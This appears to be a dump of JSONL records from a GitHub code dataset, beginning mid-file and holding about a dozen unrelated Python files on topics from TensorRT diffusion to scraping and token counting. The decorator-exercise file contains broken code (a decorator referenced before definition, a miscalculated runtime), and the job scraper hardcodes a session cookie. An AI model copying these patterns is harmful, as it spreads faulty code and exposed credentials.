list.\n\n Raises:\n RuntimeError: In case of not have a download in progress.\"\"\"\n\n if not self.is_running():\n raise RuntimeError(\"There is no download in progress\")\n\n for _download in self._downloads.values():\n await _download.stop()\n\n self._running = False\n\n def 
check_is_running(self):\n \"\"\"Checks if a download is still in progress.\"\"\"\n\n for _download in self._downloads.values():\n if _download.is_finished():\n continue\n else:\n return\n\n self._running = False\n\n def is_running(self) -> bool:\n \"\"\"Checks whether the client is running.\n\n Returns:\n ``bool``: Whether it's running or not.\n \"\"\"\n\n return self._running\n\n def get_downloads(self) -> List[Download]:\n \"\"\"Get the list of downloads.\n\n Returns:\n List of :obj:`aiodown.types.Download`: List of download objects.\n \"\"\"\n\n return self._downloads.values()\n","repo_name":"AmanoTeam/aiodown","sub_path":"aiodown/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70315233767","text":"import numpy as np\nimport nvtx\nimport time\nimport torch\nimport tensorrt as trt\nfrom utilities import TRT_LOGGER\nfrom stable_diffusion_pipeline import StableDiffusionPipeline\n\nclass Txt2ImgPipeline(StableDiffusionPipeline):\n \"\"\"\n Application showcasing the acceleration of Stable Diffusion Txt2Img v1.4, v1.5, v2.0, v2.0-base, v2.1, v2.1-base pipeline using NVidia TensorRT w/ Plugins.\n \"\"\"\n def __init__(\n self,\n scheduler=\"DDIM\",\n *args, **kwargs\n ):\n \"\"\"\n Initializes the Txt2Img Diffusion pipeline.\n\n Args:\n scheduler (str):\n The scheduler to guide the denoising process. Must be one of the [DPM, LMSD, DDIM, EulerA, PNDM].\n \"\"\"\n super(Txt2ImgPipeline, self).__init__(*args, **kwargs, \\\n scheduler=scheduler, stages=['clip','unet','vae'])\n\n def infer(\n self,\n prompt,\n negative_prompt,\n image_height,\n image_width,\n seed=None,\n warmup=False,\n verbose=False\n ):\n \"\"\"\n Run the diffusion pipeline.\n\n Args:\n prompt (str):\n The text prompt to guide image generation.\n negative_prompt (str):\n The prompt not to guide the image generation.\n image_height (int):\n Height (in pixels) of the image to be generated. Must be a multiple of 8.\n image_width (int):\n Width (in pixels) of the image to be generated. 
Must be a multiple of 8.\n seed (int):\n Seed for the random generator\n warmup (bool):\n Indicate if this is a warmup run.\n verbose (bool):\n Verbose in logging\n \"\"\"\n assert len(prompt) == len(negative_prompt)\n\n with torch.inference_mode(), torch.autocast(\"cuda\"), trt.Runtime(TRT_LOGGER):\n # Pre-initialize latents\n latents = self.initialize_latents( \\\n batch_size=len(prompt), \\\n unet_channels=4, \\\n latent_height=(image_height // 8), \\\n latent_width=(image_width // 8)\n )\n\n torch.cuda.synchronize()\n e2e_tic = time.perf_counter()\n\n # CLIP text encoder\n text_embeddings = self.encode_prompt(prompt, negative_prompt)\n\n # UNet denoiser\n latents = self.denoise_latent(latents, text_embeddings)\n\n # VAE decode latent\n images = self.decode_latent(latents)\n\n torch.cuda.synchronize()\n e2e_toc = time.perf_counter()\n\n if not warmup:\n self.print_summary(self.denoising_steps, e2e_tic, e2e_toc)\n self.save_image(images, 'txt2img', prompt)\n","repo_name":"NVIDIA/TensorRT","sub_path":"demo/Diffusion/txt2img_pipeline.py","file_name":"txt2img_pipeline.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"4979006001","text":"from django.db import models\nfrom django.conf import settings\n\n\nclass GoogleCalendar(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE, unique=True)\n access_token = models.TextField(\n blank=True,\n verbose_name=\"Access token\",\n )\n refresh_token = models.TextField(\n blank=True,\n verbose_name=\"Refresh token\",\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n","repo_name":"oldi92/django-react-oauth","sub_path":"backend/integrations/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18206150400","text":"\"\"\" Palindrome Check: Given a string find if it is a palindrome using recursion \"\"\"\n\n\"\"\"Solution: Recursively make the string shorter until length is two or one, if two compare both and return value \"\"\"\n\n\ndef palindrome_check(a) -> bool:\n if len(a) == 1 or len(a) == 0:\n return True\n return a[0] == a[-1] and palindrome_check(a[1:-1])\n\n\ndef main():\n val1 = input(\"Enter your string: \")\n if palindrome_check(val1):\n print(\"Yes\")\n else:\n print(\"No\")\n\n\n# Using the special variable\n# __name__\nif __name__ == \"__main__\":\n main()\n","repo_name":"lakshyarawal/pythonPractice","sub_path":"Recursion/palindrome_check.py","file_name":"palindrome_check.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11234356214","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 10 19:59:27 2020\r\n\r\n@author: alankar\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport mpl_toolkits.mplot3d as plt3d\r\nfrom operator import itemgetter\r\nfrom mayavi import mlab\r\n\r\nvertices = np.loadtxt('data-verts.txt')[:,1:]\r\nvertno = np.array(np.loadtxt('data-verts.txt')[:,0],dtype=np.int64) - 1\r\nsorter = sorted(zip(vertno,vertices), key=itemgetter(0))\r\n_, vertices = zip(*sorter)\r\nvertices = np.array(vertices)\r\n\r\nedges = np.array(np.loadtxt('data-edges.txt')[:,1:],dtype=np.int64) - 1 \r\nedgeno = np.array(np.loadtxt('data-edges.txt')[:,0],dtype=np.int64) - 
1\r\nsorter = sorted(zip(edgeno,edges), key=itemgetter(0))\r\n_, edges = zip(*sorter)\r\nedges = np.array(edges, dtype=np.int64)\r\n\r\nfaces = np.array(np.abs(np.loadtxt('data-faces.txt'))[:,1:-1],dtype=np.int64) - 1\r\nfaceno = np.array(np.loadtxt('data-faces.txt')[:,0],dtype=np.int64) - 1\r\nsorter = sorted(zip(faceno,faces), key=itemgetter(0))\r\n_, faces = zip(*sorter)\r\nfaces = np.array(faces, dtype=np.int64)\r\n\r\nconnectivity = np.zeros(faces.shape, dtype=np.int64)\r\nfor i in range(faces.shape[0]):\r\n this_verts = []\r\n this_edges = faces[i]\r\n for j in range(3): this_verts.append(edges[this_edges[j]])\r\n this_verts = np.array(this_verts, dtype=np.int64).flatten()\r\n this_verts = np.unique(this_verts)\r\n connectivity[i,:] = this_verts\r\n\r\nfig = plt.figure()\r\nfig.set_size_inches(20,20)\r\nax = fig.add_subplot(111, projection='3d', aspect='auto')\r\nax.view_init(azim=120)\r\n\r\n#plot the nodes\r\nfor x, y, z in vertices:\r\n ax.scatter(x, y, z, color='black', marker='s')\r\n\r\n#plot the lines\r\nfor ele, con in enumerate(connectivity):\r\n for i in range(2):\r\n xs = vertices[con[i]][0], vertices[con[i+1]][0] \r\n ys = vertices[con[i]][1], vertices[con[i+1]][1]\r\n zs = vertices[con[i]][2], vertices[con[i+1]][2]\r\n line = plt3d.art3d.Line3D(xs, ys, zs)\r\n ax.add_line(line)\r\n xs = vertices[con[0]][0], vertices[con[2]][0] \r\n ys = vertices[con[0]][1], vertices[con[2]][1]\r\n zs = vertices[con[0]][2], vertices[con[2]][2]\r\n line = plt3d.art3d.Line3D(xs, ys, zs)\r\n ax.add_line(line) \r\nplt.savefig('matplotlib-fig.png')\r\n\r\nfield = np.sin(vertices[:, 0])**2 + np.sin(vertices[:, 1])**2\r\nmlab.triangular_mesh(vertices[:, 0], vertices[:, 1], vertices[:, 2], connectivity, scalars=field) #colormap='bone')\r\nmlab.savefig('./plt-maya.png', size=(600, 600))\r\nprint('[[./plt-maya.png]]')\r\n\r\nmlab.triangular_mesh(vertices[:, 0], vertices[:, 1], vertices[:, 2], connectivity, representation='wireframe')\r\nmlab.savefig('./plt-maya-wf.png', size=(600, 600))","repo_name":"dutta-alankar/surface-evolver-dump-visualization","sub_path":"surf-create.py","file_name":"surf-create.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70946507092","text":"import sqlite3\n\ndef read_var_data():\n try:\n sqlite_connection = sqlite3.connect(\"sqlite_python.db\")\n\n cursor = sqlite_connection.cursor()\n\n sqlite_select_query = \"\"\"SELECT * FROM sqlitedb_developers\"\"\"\n\n\n cursor.execute(sqlite_select_query)\n\n record = cursor.fetchall()\n\n for row in record:\n print(\"ID\", row[0])\n print(\"Name\", row[1])\n print(\"e-email\", row[2])\n print(\"data\", row[3])\n print(\"salary\", row[4], end=\"\\n\\n\\n\\n\")\n\n \n\n cursor.close()\n\n\n except sqlite3.Error as error:\n print(\"Помилка підключення до\", error)\n finally:\n if (sqlite_connection):\n sqlite_connection.close()\n print(\"Connection закрито\")\n\n\nread_var_data()","repo_name":"Oleh1kbnmkb/Semester_III","sub_path":"flask2lessons/app5.py","file_name":"app5.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26863982505","text":"\"\"\"\nThis module defines blueprints and validation rules for any HTML forms needed in our Expense application\n\"\"\"\n\n\nfrom wtforms import Form, StringField, SelectField, FloatField, DateField, validators\nfrom models import Expense, Category\n\n\nclass ExpenseForm(Form):\n name 
= StringField('name', [validators.Length(min=3, max=64)])\n category_id = SelectField('category_id', [validators.Length(min=24, max=24)], validate_choice=False)\n amount = FloatField('amount', [validators.NumberRange(min=0.01)])\n date = DateField('date')\n # used when editing a expense to find it from the database, ignored when making new expense\n expense_id = StringField('expense_id')\n\n\nclass CategoryForm(Form):\n name = StringField('name', [validators.Length(min=3, max=64)])\n # used when editing a category to find it from the database, ignored when making new category\n category_id = StringField('category_id')\n","repo_name":"Aberdeener/2911","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"73665497169","text":"import functools\nfrom timeit import default_timer\n\n\n\ndef measure_runtime(func):\n times = []\n\n @functools.wraps(func)\n def _runtime(*args, **kwargs):\n n = 1000\n start_time = default_timer()\n for _ in range(n):\n res = func(*args, **kwargs)\n run_time = default_timer() - start_time / n\n times.append(run_time)\n print(\"runtime:\", run_time)\n return res\n _runtime.times = times\n return _runtime\n\n\nTIME_MEASUREMENT_ON = True\n\ndef measure_runtime_parameterized(n):\n num_execs = n\n @functools.wraps(_runtime)\n def _runtime(func):\n times = []\n @functools.wraps(__runtime)\n def __runtime(*args, **kwargs):\n start_time = default_timer()\n for _ in range(num_execs):\n res = func(*args, **kwargs)\n if TIME_MEASUREMENT_ON:\n run_time = default_timer() - start_time / num_execs\n times.append(run_time)\n print(\"runtime:\", run_time)\n return res\n return __runtime\n return _runtime\n\n \n\n\n\n\n\n","repo_name":"haashah/Europython2023","sub_path":"Tutorials/Decorators_deep_dive/python_decorators/decorators/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39902670745","text":"from PIL import ImageDraw, ImageFont, Image\nfrom static import *\nfrom s3_utils import *\nfrom utils import read_json_paths\nfrom image_utils import get_median_image\nimport config\nfrom utils import json_to_human_time\n\ndef get_bounding_boxes(replies, image_height, image_width, min_confidence):\n \"\"\" Processes and flattens rekognition replies \n input:\n replies ([dict]): list of rekognition replies\n image_height (float): height of the image used to scale boxes\n image_width (float): width of the image used to scale boxes\n min_confidence (float): minimum confidence to be considered a match\n output:\n out (dict): a flat list of objects detected\n e.g.\n [{\"name\": \"person\", \"left\": 100.0, \"top\": 50.0, \"width\": 200.0, \"height\": 150.0 }, ...]\n \"\"\"\n if type(replies) is not list:\n replies = [replies]\n \n min_confidence_perc = min_confidence * 100.0\n\n out = []\n for reply in replies:\n labels = reply.get(\"Labels\", [])\n for label in labels:\n name = label.get(\"Name\")\n instances = label.get(\"Instances\", [])\n for instance in instances:\n box = instance.get(\"BoundingBox\")\n confidence = instance.get(\"Confidence\", 0)\n if box and confidence > min_confidence_perc:\n left = box['Left'] * image_width\n top = box['Top'] * image_height\n width = box['Width'] * image_width\n height = box['Height'] * image_height\n out.append({\"name\": name, \"left\": left, \"top\": top, \"width\": 
width, \"height\": height})\n return out\n\n\ndef draw_boxes(image, bounding_boxes, color=(255,0,0), title=None, fill_alpha=None):\n \"\"\" Returns the labels and instances with a bounding box \n \n input:\n image (PIL Image): image to be drawn over\n bounding_boxes (list): list of dictionaries to draw, containing name, left, top, width and height\n fill_alpha (int): alpha to use when filling bounding boxes\n output:\n out (list): list of objects\n \"\"\"\n if type(bounding_boxes) is not list:\n bounding_boxes = [bounding_boxes]\n \n image_width, image_height = image.size\n font_size = min(image_width, image_height) // 20\n font = ImageFont.truetype(\"fonts/calibri.ttf\", font_size)\n\n if fill_alpha:\n image = image.convert(\"RGB\")\n tmp_draw = ImageDraw.Draw(image, \"RGBA\")\n tmp_fill = (*color, fill_alpha)\n else:\n tmp_draw = ImageDraw.Draw(image)\n \n for box in bounding_boxes:\n name = box[\"name\"]\n left = box[\"left\"]\n top = box[\"top\"]\n width = box[\"width\"]\n height = box[\"height\"]\n \n if fill_alpha:\n tmp_draw.rectangle(((left, top), (left + width, top + height)), fill=tmp_fill)\n else:\n tmp_draw.rectangle([left, top, left + width, top + height], outline=color, width=2) \n tmp_draw.text((left+1, top), name, font=font, fill=\"black\")\n tmp_draw.text((left-1, top), name, font=font, fill=\"black\")\n tmp_draw.text((left, top+1), name, font=font, fill=\"black\")\n tmp_draw.text((left, top-1), name, font=font, fill=\"black\")\n tmp_draw.text((left, top), name, font=font, fill=\"white\")\n\n if title:\n left = 10\n top = 10\n tmp_draw.text((left+1, top), title, font=font, fill=\"black\")\n tmp_draw.text((left-1, top), title, font=font, fill=\"black\")\n tmp_draw.text((left, top+1), title, font=font, fill=\"black\")\n tmp_draw.text((left, top-1), title, font=font, fill=\"black\")\n tmp_draw.text((left, top), title, font=font, fill=\"white\")\n\n return image\n\ndef get_heatmap(processed_bucket, unprocessed_bucket, file_filter, object_match, min_confidence, fill_alpha):\n \"\"\" \n Returns a heatmap of an object in a group of images\n\n Inputs:\n processed_bucket (str): name of the bucket containing the processed images\n unprocessed_bucket (str): name of the bucket containing the unprocessed images\n file_filter (lambda: [str] -> [str]): filter to apply to files in a bucket\n object_match (str): object to search for\n min_confidence (float): minimum confidence to consider a match\n fill_alpha (int): amount of alpha to provide each detection\n Outputs:\n out (dictionary): representation of detections in a set of processed images\n\n \"\"\"\n processed_files = get_s3_file_names(s3_client, processed_bucket)\n unprocessed_files = get_s3_file_names(s3_client, unprocessed_bucket)\n \n processed_files_filtered = file_filter(processed_files)\n unprocessed_files_filtered = file_filter(unprocessed_files)\n\n unprocessed_paths = download_files_from_s3(\n s3_client, config.s3_unprocessed_bucket, unprocessed_files_filtered, \"/tmp/unprocessed\")\n processed_paths = download_files_from_s3(\n s3_client, config.s3_processed_bucket, processed_files_filtered, \"/tmp/processed\")\n\n image = get_median_image(unprocessed_paths)\n replies = read_json_paths(processed_paths)\n\n bounding_boxes = get_bounding_boxes(\n replies=replies, image_height=image.height, image_width=image.width, min_confidence=min_confidence)\n \n bounding_boxes_filtered = [b for b in bounding_boxes if b.get(\"name\").lower() == object_match]\n\n # TODO: determine good alpha\n out = draw_boxes(image, 
bounding_boxes_filtered, title=object_match, fill_alpha=fill_alpha)\n return out\n\ndef get_report(processed_bucket, file_filter, object_match, min_confidence):\n \"\"\" \n Returns a report based on a bucket containing processed files\n\n Inputs:\n processed_bucket (str): name of the bucket containing the processed images\n file_filter (lambda: [str] -> [str]): filter to apply to files in a bucket\n min_confidence (float): minimum confidence to consider a match\n Outputs:\n out (dictionary): representation of detections in a set of processed images\n\n e.g.\n\n {num_frames: 2,\n start: \"...\",\n stop: \"...\",\n objects: {\n person: {\n max: 2, \n min: 1,\n mean: 1.5,\n median: 1.5,\n frames_present: 2 \n }, \n cat: {...}\n }\n }\n \"\"\"\n processed_files = get_s3_file_names(s3_client, processed_bucket)\n processed_files_filtered = file_filter(processed_files)\n\n json_to_readable_date = lambda j: dt.datetimej.replace(\".json\", \"\")\n first = json_to_human_time(min(processed_files_filtered))\n last = json_to_human_time(max(processed_files_filtered))\n \n processed_paths = download_files_from_s3(\n s3_client, config.s3_processed_bucket, processed_files_filtered, \"/tmp/processed\")\n\n replies = read_json_paths(processed_paths)\n\n frames = []\n all_names = [object_match]\n\n for reply in replies:\n boxes = get_bounding_boxes(replies=reply, image_height=1, image_width=1, min_confidence=min_confidence) # only used to unpack\n frame = {}\n for box in boxes:\n name = box.get(\"name\").lower()\n frame[name] = frame.get(name, 0) + 1\n frames.append(frame)\n \n objects = {name: {} for name in all_names}\n num_frames = len(frames)\n\n for frame in frames: \n for name, count in frame.items():\n if name == object_match:\n cur_object = objects.get(name)\n new_max = max(cur_object.get(\"max\", -float(\"inf\")), count)\n\n new_min = min(cur_object.get(\"min\", float(\"inf\")), count)\n new_total = cur_object.get(\"total\", 0) + count\n new_frames_present = cur_object.get(\"frames_present\", 0) + 1\n \n new_object = {\"max\": new_max, \"min\": new_min, \"total\": new_total, \"frames_present\": new_frames_present}\n objects[name] = new_object\n \n objects = {key: {**val, \"mean\": val.get(\"total\", 0.0) / num_frames, \"perc_present\": val.get(\"frames_present\") / num_frames} for key, val in objects.items()}\n\n summary = {\n \"num_frames\": num_frames,\n \"first\": first,\n \"last\": last,\n \"objects\": objects\n }\n\n return summary \n","repo_name":"breeko/spypy-rekognition","sub_path":"src/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23508269456","text":"import os\nimport time\nimport requests\nimport xlwt\nimport pandas as pd\n\n\nurl = 'https://hrsspub.sz.gov.cn/ggjyfw/zyjs/l5/f14040504/notLoginQueryZpxx2.action'\nurl = 'https://hrsspub.sz.gov.cn/ggjyfw/zyjs/l5/f14040504/notLoginQueryZpxx2.action'\njob_url = 'https://hrsspub.sz.gov.cn/ggjyfw/pages/homePageSkip/zpgw.jsp?aab001={0}&ccz004={1}&ccb002={2}'\nheader = {\n 'Host': 'hrsspub.sz.gov.cn',\n 'Referer': 'https://hrsspub.sz.gov.cn/ggjyfw/pages/homePageSkip/dwzpMore.jsp',\n 'Cookie': 'pgv_pvid=3516056684; _trs_uv=kv3x8k0e_914_6zg0; UM_distinctid=17cbcea201f54f-0b7dffa445552-57b193e-100200-17cbcea2020383; CNZZDATA1254585771=911925943-1635255043-null%7C1635255043; JSESSIONID=KQ69PbVCzJOgvsPQBXFd1SR5mk2M8FiiLJVxrS9yLEuKTJruvmW5!-294269610',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; 
rv:93.0) Gecko/20100101 Firefox/93.0'\n}\ndata = {\n \"limit\": \"10\"\n}\nnames = (('05', '专场招聘', 7), ('01', '委托招聘', 261), ('03', '网络招聘', 254),\n ('04', '现场招聘', 123))\nworkbook = xlwt.Workbook(encoding='utf-8')\n\ndef sava_data(job_List, name, count=0):\n worksheet = workbook.add_sheet(name)\n titles = ['序号', '单位名称', '招聘岗位', '招聘网址']\n for index, title in enumerate(titles):\n worksheet.write(0, index, title)\n for index, info in enumerate(job_List):\n for m in info['cb02DTOs']:\n count += 1\n worksheet.write(count, 0, count)\n worksheet.write(count, 1, info['aab004'])\n worksheet.write(count, 2, m['cac020'])\n worksheet.write(count, 3, job_url.format(info['aab001'], m['ccz004'], m['ccb002']))\n if not os.path.exists('szjob/excel/'):\n os.mkdir('szjob/excel/')\n workbook.save('szjob/excel/岗位.xlsx')\n\n\ndef get_data():\n for name in names:\n data[\"ccb002in\"] = name[0]\n data[\"start\"] = '1'\n res = requests.post(url, headers=header, params=data)\n print(res.url)\n df_res = pd.DataFrame(res.json())\n job = df_res['result'][0]['companyDTOs']\n for i in range(10, name[2], 10):\n data[\"start\"] = str(i)\n response = requests.post(url, headers=header, params=data)\n print(response.url)\n df_response = pd.DataFrame(response.json())\n job += df_response['result'][0]['companyDTOs']\n time.sleep(3)\n sava_data(job, name[1])\n\n\nif __name__ == \"__main__\":\n get_data()\n","repo_name":"Jliucheng/pythonproject","sub_path":"szjob/getInfo.py","file_name":"getInfo.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"31068301939","text":"import re\nimport os\nimport collections\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport sys\n\n# some global vars that are used by the functions, can be easily changed\nnum_tokens_per_lang = 40\nnum_tokens_to_show = 20\n\n# path_curr = os.path.dirname(__file__) # pathname of this module\n# path_repos = os.path.join(path_curr, path_repos)\n\npath_df_train = 'processed_data/df_train.csv'\npath_df_valid = 'processed_data/df_valid.csv'\npath_df_test = 'processed_data/df_test.csv'\npath_repos = './code-repos'\npath_dir_for_processed_data = './processed_data/'\npath_file_list_full = path_dir_for_processed_data + 'file_list_full.csv'\npath_file_list_subset = path_dir_for_processed_data + 'file_list_subset.csv'\npath_file_list_train = path_dir_for_processed_data + 'file_list_train.csv'\npath_file_list_valid = path_dir_for_processed_data + 'file_list_valid.csv'\npath_file_list_test = path_dir_for_processed_data + 'file_list_test.csv'\npath_top_tokens_per_lang = path_dir_for_processed_data + 'top_tokens_per_lang.csv'\n\n# desired_file_extensions = ['.html', '.java', '.py', '.c', '.cpp', '.rb', '.php']\n# counter_html = collections.Counter()\n# counter_java = collections.Counter()\n# counter_py = collections.Counter()\n# counter_c = collections.Counter()\n# counter_cpp = collections.Counter()\n# counter_rb = collections.Counter()\n# counter_php = collections.Counter()\n# num_files = {'.html': 0, '.java': 0, '.py': 0, '.c': 0, '.cpp': 0, '.rb': 0, '.php': 0}\n# top_tokens = {'.html': [], '.java': [], '.py': [], '.c': [], '.cpp': [], '.rb': [], '.php': [], 'all': []}\n\nlang_exts_with_dot = [] # will be set by preprocess_repos(), the entry function for this module\nnum_files = {}\ntop_tokens = {'all': []}\nlang_counters = {}\n\n\n# if __name__ == \"__main__\":\ndef preprocess_repos(langs_extension):\n 
setup_global_vars(langs_extension)\n # print_global_vars()\n generate_file_lists()\n build_token_dicts()\n build_dataset()\n\ndef setup_global_vars(langs_extension):\n global lang_exts_with_dot\n lang_exts_with_dot = [f'.{x}' for x in langs_extension]\n for lang_ext in lang_exts_with_dot:\n num_files[lang_ext] = 0\n top_tokens[lang_ext] = []\n lang_counters[lang_ext] = collections.Counter()\n\n# def print_global_vars():\n# print(lang_exts_with_dot)\n# print(num_files)\n# print(top_tokens)\n# print(lang_counters)\n\n\ndef generate_file_lists():\n file_list_full = []\n labels_full = []\n for root, subdir, files in os.walk(path_repos):\n for file in files:\n ext = os.path.splitext(file)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n num_files[ext] += 1\n filepath = os.path.join(root, file)\n file_list_full.append(filepath)\n labels_full.append(ext)\n\n df_file_list_full = pd.DataFrame()\n df_file_list_full['filepaths'] = file_list_full\n df_file_list_full['label'] = labels_full\n df_file_list_full.to_csv(path_file_list_full)\n\n num_files_per_lang = min(num_files.values()) // 100 * 100 # round down to next 100\n # num_files_per_lang = min(2000, num_files_per_lang) # do not use more than 2000\n df_file_list_subset = df_file_list_full.groupby('label').sample(num_files_per_lang)\n df_file_list_subset.to_csv(path_file_list_subset)\n \n # df_file_list_train = pd.DataFrame()\n # df_file_list_valid = pd.DataFrame()\n # df_file_list_test = pd.DataFrame()\n\n # produces a 60%, 20%, 20% split for training, validation and test sets\n # df_file_list_train['filepaths'], df_file_list_valid['filepaths'], df_file_list_test['filepaths'] = np.split(df_file_list_full['filepaths'].sample(frac=1), [int(.6*len(df_file_list_full['filepaths'])), int(.8*len(df_file_list_full['filepaths']))])\n\n df_file_list_train, df_file_list_test = train_test_split(df_file_list_subset, test_size=0.2, random_state=42)\n df_file_list_train, df_file_list_valid = train_test_split(df_file_list_train, test_size=0.25, random_state=42)\n\n df_file_list_train.to_csv(path_file_list_train)\n df_file_list_valid.to_csv(path_file_list_valid)\n df_file_list_test.to_csv(path_file_list_test)\n\n # print(df_file_list_full['label'].value_counts())\n # print(df_file_list_subset['label'].value_counts())\n # print(df_file_list_train['label'].value_counts())\n # print(df_file_list_valid['label'].value_counts())\n # print(df_file_list_test['label'].value_counts())\n\ndef tokenize(text):\n # split by non-word characters, keep the matched pattern/delimiters\n tokens = re.split('(\\W)', text)\n tokens = [x for x in tokens if (x != None and x.strip() != \"\")]\n return tokens\n\ndef tokenize_file(filepath):\n f = open(filepath, 'rb')\n text = f.read().decode(errors='replace')\n return tokenize(text)\n\ndef build_token_dicts(dir_search='./code-repos'):\n df = pd.read_csv(path_file_list_train)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n file_count = 0\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n try:\n tokens = tokenize_file(filepath)\n except:\n continue\n \n lang_counters[ext].update(tokens)\n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building token dict: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print(\"\\n\")\n\n df = pd.DataFrame()\n for lang, counter in lang_counters.items():\n print(\"Files with extension {%s}: %d\" % (lang, 
num_files[lang]))\n df[lang] = [token for (token, count) in counter.most_common(num_tokens_per_lang)]\n \n df.to_csv(path_top_tokens_per_lang)\n print(\"\\nThese are the top %d tokens for the %d languages\" % (num_tokens_to_show, len(lang_exts_with_dot)))\n print(df.head(n=num_tokens_to_show))\n print()\n\ndef vectorize(tokens):\n num_tokens = len(tokens)\n\n counter = collections.Counter(tokens)\n vector = [counter[token] for token in top_tokens['all']]\n return vector\n\ndef vectorize_file(filepath):\n tokens = tokenize_file(filepath)\n return vectorize(tokens)\n\ndef populate_top_tokens():\n global top_tokens\n \n df_top_tokens = pd.read_csv(path_top_tokens_per_lang)\n for x in lang_exts_with_dot:\n top_tokens[x] = list(df_top_tokens[x])\n top_tokens['all'] += top_tokens[x]\n\n # remove duplicated tokens from top_tokens['all']\n top_tokens['all'] = list(set(top_tokens['all']))\n\ndef build_dataset():\n populate_top_tokens()\n \n num_features = len(top_tokens['all'])\n\n df_train = pd.DataFrame()\n X_train = np.empty((0, num_features), dtype=np.uint32)\n y_train = []\n\n df_valid = pd.DataFrame()\n X_valid = np.empty((0, num_features), dtype=np.uint32)\n y_valid = []\n\n df_test = pd.DataFrame()\n X_test = np.empty((0, num_features), dtype=np.uint32)\n y_test = []\n\n file_count = 0\n df = pd.read_csv(path_file_list_train)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_train.append(ext)\n X_train = np.vstack((X_train, vector))\n \n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_train: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print()\n\n df_train = pd.DataFrame(\n data=X_train,\n columns=top_tokens['all']\n )\n df_train['label'] = y_train\n df_train.to_csv(path_df_train, index=False)\n\n file_count = 0\n df = pd.read_csv(path_file_list_valid)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_valid.append(ext)\n X_valid = np.vstack((X_valid, vector))\n\n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_valid: [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n\n print()\n\n df_valid = pd.DataFrame(\n data=X_valid,\n columns=top_tokens['all']\n )\n df_valid['label'] = y_valid\n df_valid.to_csv(path_df_valid, index=False)\n\n file_count = 0\n df = pd.read_csv(path_file_list_test)\n filepaths = df['filepaths']\n filepaths_length = len(filepaths)\n\n for filepath in filepaths:\n ext = os.path.splitext(filepath)[-1].lower()\n if not ext in lang_exts_with_dot:\n continue\n\n try:\n vector = vectorize_file(filepath)\n except:\n continue\n y_test.append(ext)\n X_test = np.vstack((X_test, vector))\n \n file_count += 1\n sys.stdout.write('\\r')\n sys.stdout.write(\"Building df_test : [%-20s] %d%%\" % ('='*int(20 / filepaths_length * file_count), int(100 / filepaths_length * file_count)))\n sys.stdout.flush()\n \n print(\"\\n\")\n\n df_test = pd.DataFrame(\n data=X_test,\n columns=top_tokens['all']\n )\n df_test['label'] = y_test\n df_test.to_csv(path_df_test, 
